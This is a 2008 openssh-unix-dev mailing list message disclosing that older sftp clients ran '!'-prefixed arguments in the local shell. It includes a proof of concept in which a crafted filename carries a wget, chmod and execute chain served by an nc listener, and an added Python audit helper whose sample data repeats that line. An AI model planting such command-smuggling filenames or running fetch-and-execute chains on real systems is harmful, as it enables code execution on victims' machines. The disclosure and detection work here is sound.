Strange sftp input parameter handling, user assisted code execution?

Roman Fiedler roman.fiedler at
Wed Jun 18 17:23:09 EST 2008

Damien Miller wrote:
> On Wed, 18 Jun 2008, Damien Miller wrote:
>> On Tue, 17 Jun 2008, Roman Fiedler wrote:
>>> Hello list,
>>> I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
>>> sftp>  get !xxxx
>>> /bin/bash: xxxx: command not found
>>> Shell exited with status 127
>> Can you reproduce this with OpenSSH 5.0p1?
> I can't reproduce this with 5.0, but I can with 4.7p1 so I guess
> it was fixed in my sftp argument processing rewrite.
> -d

That's good. I was just confused that the ! did also work for the 
arguments and not only in front of a command (!get). I just did not 
think that copy/pasting a remote filename to a get could cause this.

I looked at it a little bit closer and found that only direct copy and 
paste of filenames from "ls" output can be harmful, no problem with mget *.

Regards, roman

PS: You were correct that the /bin/bash test did not work, that was a 
mistake during testing, but the other test case works:

   cd Tmp
   touch '!wget -O cmds ; chmod 0755 cmds ; . cmds'
   nc -vnlp 1234

   When connected send:
HTTP/1.1 200 OK
Content-Length: 60

echo "This output is from remote command!"
# padding ................................

sftp> cd Tmp
sftp> ls
!wget -O cmds ; chmod 0755 cmds ; . cmds 

sftp> get !wget -O cmds ; chmod 0755 cmds ; . cmds
            => `cmds'
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 70

100%[====================================>] 70            --.--K/s 

09:09:36 (102.05 KB/s) - `cmds' saved [70/70]

This output is from remote command!

(The wget line is split across lines in the mail client; make sure to 
have it on one line in the test).
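The following audit helper is an added example and is not code from the thread or from OpenSSH. It takes the defender's side of the behaviour Roman describes: scanning remote `ls` output for names that begin with `!` (the sftp shell-escape prefix) or carry shell metacharacters, and checking sftp command lines for arguments that begin with `!`. It assumes, as the thread's `get !xxxx` example shows, that the affected pre-5.0 client handed such an argument to the local shell; the sample listing and command lines are constructed for the demonstration, and treating each listing line as one name (plain `ls`, not `ls -l`) is an assumption.

```python
"""Audit helper for sftp listings and command lines (added example, not from the thread).

Assumption: a pre-5.0 sftp client treated an argument beginning with '!' as a
shell escape, so a pasted filename such as '!wget -O cmds ; ...' ran in the
local shell. The checks below flag that pattern before it reaches a client.
"""
import shlex

# Characters that make a filename look like a crafted shell command line.
SHELL_META = set(";|&`$<>(){}")


def suspicious_reasons(name):
    """Return the reasons a remote filename looks crafted for the '!' issue (empty if none)."""
    reasons = []
    if name.startswith("!"):
        reasons.append("starts with '!' (sftp shell-escape prefix)")
    meta = sorted(SHELL_META & set(name))
    if meta:
        reasons.append("contains shell metacharacters: " + " ".join(meta))
    return reasons


def audit_listing(listing_lines):
    """Scan raw `sftp> ls` output; each non-empty line is treated as one name (assumption)."""
    findings = []
    for raw in listing_lines:
        name = raw.rstrip()
        if not name or name.startswith("sftp>"):
            continue  # skip the prompt line and blank lines
        reasons = suspicious_reasons(name)
        if reasons:
            findings.append((name, reasons))
    return findings


def _tokenize(line):
    """Split like the shell would; fall back to whitespace on unbalanced quotes."""
    try:
        return shlex.split(line)
    except ValueError:
        return line.split()


def risky_arguments(command_line):
    """Return the arguments of one sftp command line that begin with '!'.

    A line that itself starts with '!' is the documented shell escape and is
    intentional, so it is not reported; only '!' hidden inside an argument is.
    """
    line = command_line.strip()
    if line.startswith("sftp>"):
        line = line[len("sftp>"):].strip()
    if not line or line.startswith("!"):
        return []
    tokens = _tokenize(line)
    return [tok for tok in tokens[1:] if tok.startswith("!")]


def audit_batch(lines):
    """Check every line of an sftp batch file or transcript; return (line, risky args) pairs."""
    results = []
    for line in lines:
        risky = risky_arguments(line)
        if risky:
            results.append((line, risky))
    return results


if __name__ == "__main__":
    # Constructed sample data mirroring the shape of the thread's session.
    LISTING = [
        "sftp> ls",
        "!wget -O cmds ; chmod 0755 cmds ; . cmds ",
        "notes.txt",
        "report;rm.txt",
    ]
    BATCH = [
        "cd Tmp",
        "get notes.txt",
        "get !wget -O cmds ; chmod 0755 cmds ; . cmds",
        "!ls",
    ]
    for name, reasons in audit_listing(LISTING):
        print("listing:", repr(name), "->", "; ".join(reasons))
    for line, risky in audit_batch(BATCH):
        print("command:", repr(line), "-> risky args:", risky)
```

Run the file directly to see both reports; `audit_listing` is the one to point at the output of a remote `ls` before any names are pasted into an older client, and `audit_batch` is suited to reviewing sftp batch files (`sftp -b`) in a pipeline.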

More information about the openssh-unix-dev mailing list